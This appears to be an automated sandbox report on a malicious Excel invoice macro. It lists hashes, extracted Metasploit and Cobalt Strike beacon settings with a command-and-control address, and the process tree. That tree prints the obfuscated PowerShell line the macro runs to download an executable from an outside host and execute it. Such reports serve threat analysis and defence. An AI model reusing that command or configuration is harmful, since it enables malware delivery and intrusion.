Analysis
-
max time kernel
141s -
max time network
143s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
23-08-2021 22:17
Static task
static1
Behavioral task
behavioral1
Sample
Invoice453891.xlsm
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Invoice453891.xlsm
Resource
win10v20210410
General
-
Target
Invoice453891.xlsm
-
Size
86KB
-
MD5
9ef60e9f0364cfc381fe5c870e9e10f0
-
SHA1
67173558f554be3acd49292c4614aa5ee81ecfa3
-
SHA256
0e37b2666933d637c97224ff505132118838c2889d1aa3ed385817badd17d1b2
-
SHA512
3603ac6e154637d808ec254b5cbb23f97e994538a3a35305ec4ac9b1a0606717a8e4b45e59d8677753e1bacac45b79baa18fee428118b68b23bdc6fde559acf5
Malware Config
Extracted
metasploit
windows/download_exec
http://5.8.18.118:45500/pSXA
- headers User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Extracted
cobaltstrike
0
http://5.8.18.118:45500/match
-
access_type
512
-
host
5.8.18.118,/match
-
http_header1
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
polling_time
60000
-
port_number
45500
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJhcL+QgQWtf6S7zPp5hjImG+2YcPl18geU4f5JlSPXHwilbK4DFb/ePWyKFjhrA7emVRqhM21QMlo1ANsn14rY/RO2pzuft8P7TXoIjjI/B2GGVuzYNZX6X4I2EwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
4096
-
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/submit.php
-
user_agent
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUS)
-
watermark
0
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1960 1052 Cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1736 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
JavaHelpApplication.exepid process 1764 JavaHelpApplication.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 1736 powershell.exe 1736 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1052 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1736 powershell.exe 1736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1736 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 1052 EXCEL.EXE 1052 EXCEL.EXE 1052 EXCEL.EXE 1052 EXCEL.EXE 1052 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EXCEL.EXECmd.exepowershell.exedescription pid process target process PID 1052 wrote to memory of 1960 1052 EXCEL.EXE Cmd.exe PID 1052 wrote to memory of 1960 1052 EXCEL.EXE Cmd.exe PID 1052 wrote to memory of 1960 1052 EXCEL.EXE Cmd.exe PID 1052 wrote to memory of 1960 1052 EXCEL.EXE Cmd.exe PID 1960 wrote to memory of 1736 1960 Cmd.exe powershell.exe PID 1960 wrote to memory of 1736 1960 Cmd.exe powershell.exe PID 1960 wrote to memory of 1736 1960 Cmd.exe powershell.exe PID 1960 wrote to memory of 1736 1960 Cmd.exe powershell.exe PID 1736 wrote to memory of 1764 1736 powershell.exe JavaHelpApplication.exe PID 1736 wrote to memory of 1764 1736 powershell.exe JavaHelpApplication.exe PID 1736 wrote to memory of 1764 1736 powershell.exe JavaHelpApplication.exe PID 1736 wrote to memory of 1764 1736 powershell.exe JavaHelpApplication.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Invoice453891.xlsm1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\Cmd.exeCmd /c powershell -nop -w hidden Set-Item Variable:/HBl (New-Object Net.WebClient);SI Variable:6ik 'http://mw.theformangroup.com/yml.xml';Set-Variable 9ul 'C:\ProgramData\JavaHelpApplication.exe';(DIR Variable:\HBl).Value.DownloadFile((LS Variable:6ik).Value,(GV 9ul -Valu));Start-Process 'C:\ProgramData\JavaHelpApplication.exe'2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -w hidden Set-Item Variable:/HBl (New-Object Net.WebClient);SI Variable:6ik 'http://mw.theformangroup.com/yml.xml';Set-Variable 9ul 'C:\ProgramData\JavaHelpApplication.exe';(DIR Variable:\HBl).Value.DownloadFile((LS Variable:6ik).Value,(GV 9ul -Valu));Start-Process 'C:\ProgramData\JavaHelpApplication.exe'3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\ProgramData\JavaHelpApplication.exe"C:\ProgramData\JavaHelpApplication.exe"4⤵
- Executes dropped EXE
PID:1764
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
a93903d1e907ce0e65658fb7dc4c9ea4
SHA1be0232663b1822c7c3c845d23977a5d0e6745f9e
SHA2560caf9fb9d1057d93e09ecdf84e1c383c70ac8f01693601d0567569c0ebee9e7f
SHA512031a3273cce82d59dcbb1419a4c22da3086c011a92bc6adc43c9f6d6083242cddb69c068f4d2fe5924a65afae391d8eeae50b4e6541feb991851482149b00fa7
-
MD5
a93903d1e907ce0e65658fb7dc4c9ea4
SHA1be0232663b1822c7c3c845d23977a5d0e6745f9e
SHA2560caf9fb9d1057d93e09ecdf84e1c383c70ac8f01693601d0567569c0ebee9e7f
SHA512031a3273cce82d59dcbb1419a4c22da3086c011a92bc6adc43c9f6d6083242cddb69c068f4d2fe5924a65afae391d8eeae50b4e6541feb991851482149b00fa7
-
MD5
a93903d1e907ce0e65658fb7dc4c9ea4
SHA1be0232663b1822c7c3c845d23977a5d0e6745f9e
SHA2560caf9fb9d1057d93e09ecdf84e1c383c70ac8f01693601d0567569c0ebee9e7f
SHA512031a3273cce82d59dcbb1419a4c22da3086c011a92bc6adc43c9f6d6083242cddb69c068f4d2fe5924a65afae391d8eeae50b4e6541feb991851482149b00fa7